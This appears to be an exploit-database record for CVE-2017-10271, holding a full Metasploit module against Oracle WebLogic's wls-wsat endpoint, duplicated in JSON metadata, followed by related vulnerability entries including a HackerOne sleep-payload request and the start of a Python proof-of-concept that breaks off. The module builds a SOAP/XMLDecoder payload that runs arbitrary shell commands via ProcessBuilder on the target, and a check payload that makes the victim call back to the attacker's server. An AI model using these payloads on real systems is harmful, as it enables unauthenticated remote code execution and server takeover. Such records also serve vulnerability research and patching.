##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
# include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
and will not be used when executing the exploit itself.
),
'License' => MSF_LICENSE,
'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' =>
[
['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
['CVE', '2017-10271'],
['EDB', '43458']
],
'Platform' => %w{ win unix },
'Arch' => [ ARCH_CMD ],
'Targets' =>
[
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
],
'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0
)
)
register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
])
end
def cmd_base
if target['Platform'] == 'win'
return 'cmd'
else
return '/bin/sh'
end
end
def cmd_opt
if target['Platform'] == 'win'
return '/c'
else
return '-c'
end
end
#
# This generates a XML payload that will execute the desired payload on the RHOST
#
def exploit_process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>#{cmd_base}</string>
</void>
<void index="1">
<string>#{cmd_opt}</string>
</void>
<void index="2">
<string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
#
# This builds a XML payload that will generate a HTTP GET request to our SRVHOST
# from the target machine.
#
def check_process_builder_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>#{get_uri.encode(xml: :text)}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
#
# In the event that a 'check' host responds, we should respond randomly so that we don't clog up
# the logs too much with a no response error or similar.
#
def on_request_uri(cli, request)
random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
send_response(cli, random_content)
@received_request = true
end
#
# The exploit method connects to the remote service and sends a randomly generated string
# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
# the response from. This is based off of the exploit technique from
# exploits/windows/novell/netiq_pum_eval.rb
#
# This doesn't work as is because MSF cannot mix HttpServer and HttpClient
# at the time of authoring this
#
# def check
# start_service
#
# print_status('Sending the check payload...')
# res = send_request_cgi({
# 'method' => 'POST',
# 'uri' => normalize_uri(target_uri.path),
# 'data' => check_process_builder_payload,
# 'ctype' => 'text/xml;charset=UTF-8'
# }, datastore['TIMEOUT'])
#
# print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
#
# waited = 0
# until @received_request
# sleep 1
# waited += 1
# if waited > datastore['HTTP_DELAY']
# stop_service
# return Exploit::CheckCode::Safe
# end
# end
#
# stop_service
# return Exploit::CheckCode::Vulnerable
# end
#
# The exploit method connects to the remote service and sends the specified payload
# encapsulated within a SOAP XML body.
#
def exploit
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => exploit_process_builder_payload,
'ctype' => 'text/xml;charset=UTF-8'
}, datastore['TIMEOUT'])
end
end
{"id": "EDB-ID:43924", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)", "description": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit). CVE-2017-10271. Remote exploit for Multiple platform. Tags: Metasplo...", "published": "2018-01-29T00:00:00", "modified": "2018-01-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/43924/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-10271"], "lastseen": "2018-01-29T18:52:53", "viewCount": 416, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-01-29T18:52:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-10271"]}, {"type": "attackerkb", "idList": ["AKB:7992242A-E0F4-4572-BE13-859467611F09"]}, {"type": "symantec", "idList": ["SMNTC-101304"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "seebug", "idList": ["SSV:97009"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "FIREEYE:6B4CFD4290F6444DFC070D828CEC509A"]}, {"type": "exploitdb", "idList": ["EDB-ID:43458", "EDB-ID:43392"]}, {"type": "zdt", "idList": ["1337DAY-ID-29668", "1337DAY-ID-29395"]}, {"type": "securelist", "idList": ["SECURELIST:2782756D428D10F166A1D130F4307D33", "SECURELIST:C7E3F6A27205B506CE8683317323C0BC"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "EXPLOITPACK:E47A4ABCB334901131160C872A570166"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE", "MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE"]}, {"type": "nessus", "idList": ["WEBLOGIC_2017_10271.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146143"]}, {"type": "threatpost", "idList": ["THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:555BCC102B10B8C6CABB0054595AC756"]}, {"type": "thn", "idList": ["THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:EEB3BA59922DDC6B345B8E6C153593DA"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "TALOSBLOG:7B703A19FAC4E490CFFB2AE43C1606DF", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "pentestit", "idList": ["PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811244"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934", "KITPLOIT:5052987141331551837", "KITPLOIT:5420210148456420402"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2017", "ORACLE:CPUOCT2017-3236626"]}], "modified": "2018-01-29T18:52:53", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/43924/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n # include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\r\n 'Description' => %q(\r\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\r\n remote code execution vulnerability. Supported versions that are affected are\r\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\r\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\r\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\r\n and will not be used when executing the exploit itself.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\r\n 'Luffin', # Proof of Concept\r\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\r\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\r\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\r\n ['CVE', '2017-10271'],\r\n ['EDB', '43458']\r\n ],\r\n 'Platform' => %w{ win unix },\r\n 'Arch' => [ ARCH_CMD ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\r\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\r\n ],\r\n 'DisclosureDate' => \"Oct 19 2017\",\r\n # Note that this is by index, rather than name. It's generally easiest\r\n # just to put the default at the beginning of the list and skip this\r\n # entirely.\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\r\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\r\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\r\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\r\n ])\r\n end\r\n\r\n def cmd_base\r\n if target['Platform'] == 'win'\r\n return 'cmd'\r\n else\r\n return '/bin/sh'\r\n end\r\n end\r\n\r\n def cmd_opt\r\n if target['Platform'] == 'win'\r\n return '/c'\r\n else\r\n return '-c'\r\n end\r\n end\r\n\r\n\r\n #\r\n # This generates a XML payload that will execute the desired payload on the RHOST\r\n #\r\n def exploit_process_builder_payload\r\n # Generate a payload which will execute on a *nix machine using /bin/sh\r\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>#{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>#{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>#{payload.encoded.encode(xml: :text)}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </void>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>}\r\n end\r\n\r\n #\r\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\r\n # from the target machine.\r\n #\r\n def check_process_builder_payload\r\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <void id=\"url\" class=\"java.net.URL\">\r\n <string>#{get_uri.encode(xml: :text)}</string>\r\n </void>\r\n <void idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </void>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>}\r\n end\r\n\r\n #\r\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\r\n # the logs too much with a no response error or similar.\r\n #\r\n def on_request_uri(cli, request)\r\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\r\n send_response(cli, random_content)\r\n\r\n @received_request = true\r\n end\r\n\r\n #\r\n # The exploit method connects to the remote service and sends a randomly generated string\r\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\r\n # the response from. This is based off of the exploit technique from\r\n # exploits/windows/novell/netiq_pum_eval.rb\r\n #\r\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\r\n # at the time of authoring this\r\n #\r\n # def check\r\n # start_service\r\n #\r\n # print_status('Sending the check payload...')\r\n # res = send_request_cgi({\r\n # 'method' => 'POST',\r\n # 'uri' => normalize_uri(target_uri.path),\r\n # 'data' => check_process_builder_payload,\r\n # 'ctype' => 'text/xml;charset=UTF-8'\r\n # }, datastore['TIMEOUT'])\r\n #\r\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\r\n #\r\n # waited = 0\r\n # until @received_request\r\n # sleep 1\r\n # waited += 1\r\n # if waited > datastore['HTTP_DELAY']\r\n # stop_service\r\n # return Exploit::CheckCode::Safe\r\n # end\r\n # end\r\n #\r\n # stop_service\r\n # return Exploit::CheckCode::Vulnerable\r\n # end\r\n\r\n #\r\n # The exploit method connects to the remote service and sends the specified payload\r\n # encapsulated within a SOAP XML body.\r\n #\r\n def exploit\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'data' => exploit_process_builder_payload,\r\n 'ctype' => 'text/xml;charset=UTF-8'\r\n }, datastore['TIMEOUT'])\r\n end\r\nend", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:36:32", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "title": "CVE-2017-10271", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:43:10", "bulletinFamily": "info", "cvelist": ["CVE-2017-10271"], "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\n\n \n**Recent assessments:** \n \n**wchen-r7** at May 23, 2019 5:44pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**asoto-r7** at September 12, 2019 6:06pm UTC reported:\n\nStraight forward and reliable exploitation. No auth required. WebLogic is quite well known and it is also bundled in other products. Should be a pentester\u2019s favorite.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-09-02T00:00:00", "published": "2017-10-19T00:00:00", "id": "AKB:7992242A-E0F4-4572-BE13-859467611F09", "href": "https://attackerkb.com/topics/KjHcjsGuez/cve-2017-10271---oracle-weblogic-server-asyncresponseservice-deserialization-vulnerability", "type": "attackerkb", "title": "CVE-2017-10271 - Oracle WebLogic Server AsyncResponseService Deserialization Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "symantec": [{"lastseen": "2018-03-27T15:57:26", "bulletinFamily": "software", "cvelist": ["CVE-2017-10271"], "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-10-17T00:00:00", "published": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2019-07-02T07:43:34", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-10271"], "description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. \n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "modified": "2019-07-01T19:54:20", "published": "2019-05-10T22:23:31", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2018-06-26T22:23:22", "description": "### \u6f0f\u6d1e\u63cf\u8ff0\r\n \u9ed1\u5ba2\u5229\u7528WebLogic \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff08CVE-2017-3248\uff09\u548cWebLogic WLS \u7ec4\u4ef6\u6f0f\u6d1e\uff08CVE-2017-10271\uff09\u5bf9\u4f01\u4e1a\u670d\u52a1\u5668\u53d1\u8d77\u5927\u8303\u56f4\u8fdc\u7a0b\u653b\u51fb\uff0c\u6709\u5927\u91cf\u4f01\u4e1a\u7684\u670d\u52a1\u5668\u88ab\u653b\u9677\uff0c\u4e14\u88ab\u653b\u51fb\u4f01\u4e1a\u6570\u91cf\u5448\u73b0\u660e\u663e\u4e0a\u5347\u8d8b\u52bf\uff0c\u9700\u8981\u5f15\u8d77\u9ad8\u5ea6\u91cd\u89c6\u3002\u5176\u4e2d\uff0cCVE-2017-10271\u662f\u4e00\u4e2a\u6700\u65b0\u7684\u5229\u7528Oracle WebLogic\u4e2dWLS \u7ec4\u4ef6\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u5c5e\u4e8e\u6ca1\u6709\u516c\u5f00\u7ec6\u8282\u7684\u91ce\u5916\u5229\u7528\u6f0f\u6d1e\uff0c\u5927\u91cf\u4f01\u4e1a\u5c1a\u672a\u53ca\u65f6\u5b89\u88c5\u8865\u4e01\u3002\u5b98\u65b9\u5728 2017 \u5e74 10 \u6708\u4efd\u53d1\u5e03\u4e86\u8be5\u6f0f\u6d1e\u7684\u8865\u4e01\u3002\r\n \r\n \u8be5\u6f0f\u6d1e\u7684\u5229\u7528\u65b9\u6cd5\u8f83\u4e3a\u7b80\u5355\uff0c\u653b\u51fb\u8005\u53ea\u9700\u8981\u53d1\u9001\u7cbe\u5fc3\u6784\u9020\u7684 HTTP \u8bf7\u6c42\uff0c\u5c31\u53ef\u4ee5\u62ff\u5230\u76ee\u6807\u670d\u52a1\u5668\u7684\u6743\u9650\uff0c\u5371\u5bb3\u5de8\u5927\u3002\u7531\u4e8e\u6f0f\u6d1e\u8f83\u65b0\uff0c\u76ee\u524d\u4ecd\u7136\u5b58\u5728\u5f88\u591a\u4e3b\u673a\u5c1a\u672a\u66f4\u65b0\u76f8\u5173\u8865\u4e01\u3002\u9884\u8ba1\u5728\u6b64\u6b21\u7a81\u53d1\u4e8b\u4ef6\u4e4b\u540e\uff0c\u5f88\u53ef\u80fd\u51fa\u73b0\u653b\u51fb\u4e8b\u4ef6\u6570\u91cf\u6fc0\u589e\uff0c\u5927\u91cf\u65b0\u4e3b\u673a\u88ab\u653b\u9677\u7684\u60c5\u51b5\u3002\r\n\t\r\n \u653b\u51fb\u8005\u80fd\u591f\u540c\u65f6\u653b\u51fbWindows\u53caLinux\u4e3b\u673a\uff0c\u5e76\u5728\u76ee\u6807\u4e2d\u957f\u671f\u6f5c\u4f0f\u3002\u7531\u4e8eOracle WebLogic\u7684\u4f7f\u7528\u9762\u8f83\u4e3a\u5e7f\u6cdb\uff0c\u653b\u51fb\u9762\u6d89\u53ca\u5404\u4e2a\u884c\u4e1a\u3002\u6b64\u6b21\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6728\u9a6c\u4e3a\u5178\u578b\u7684\u6bd4\u7279\u5e01\u6316\u77ff\u6728\u9a6c\u3002\u4f46\u8be5\u6f0f\u6d1e\u53ef\u88ab\u9ed1\u5ba2\u7528\u4e8e\u5176\u5b83\u76ee\u7684\u653b\u51fb\u3002\r\n \r\n### \u5f71\u54cd\u7248\u672c\r\n\r\n* Oracle Weblogic Server 10.3.6.0\r\n\r\n* Oracle Weblogic Server 12.2.1.2\r\n\r\n* Oracle Weblogic Server 12.2.1.1\r\n\r\n* Oracle Weblogic Server 12.1.3.0", "published": "2017-12-22T00:00:00", "type": "seebug", "title": "Oracle WebLogic wls-wsat RCE(CVE-2017-10271)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271", "CVE-2017-3248"], "modified": "2017-12-22T00:00:00", "id": "SSV:97009", "href": "https://www.seebug.org/vuldb/ssvid-97009", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport random\r\nimport string\r\nimport urlparse\r\nimport time\r\n\r\nfrom pocsuite.api.request import req\r\nfrom pocsuite.api.poc import register\r\nfrom pocsuite.api.poc import Output, POCBase\r\nfrom pocsuite.lib.core.data import logger\r\n\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '97009'\r\n version = '1'\r\n author = ''\r\n vulDate = '2017-10-23'\r\n createDate = '2017-12-22'\r\n updateDate = '2017-12-22'\r\n references = [\r\n 'https://www.seebug.org/vuldb/ssvid-97009',\r\n ]\r\n name = 'Oracle WebLogic wls-wsat RCE(CVE-2017-10271)'\r\n appPowerLink = 'https://www.oracle.com/middleware/weblogic/index.html'\r\n appName = 'WebLogic'\r\n appVersion = ''\r\n vulType = 'Remote Command Execution'\r\n desc = '''\r\n Oracle Fusion Middleware\uff08Oracle\u878d\u5408\u4e2d\u95f4\u4ef6\uff09\u662f\u7f8e\u56fd\u7532\u9aa8\u6587\uff08Oracle\uff09\u516c\u53f8\u7684\u4e00\u5957\u9762\u5411\u4f01\u4e1a\u548c\u4e91\u73af\u5883\u7684\u4e1a\u52a1\u521b\u65b0\u5e73\u53f0\u3002\u8be5\u5e73\u53f0\u63d0\u4f9b\u4e86\u4e2d\u95f4\u4ef6\u3001\u8f6f\u4ef6\u96c6\u5408\u7b49\u529f\u80fd\u3002Oracle WebLogic Server\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u9002\u7528\u4e8e\u4e91\u73af\u5883\u548c\u4f20\u7edf\u73af\u5883\u7684\u5e94\u7528\u670d\u52a1\u5668\u7ec4\u4ef6\u3002\r\nOracle Fusion Middleware\u4e2d\u7684Oracle WebLogic Server\u7ec4\u4ef6\u7684WLS 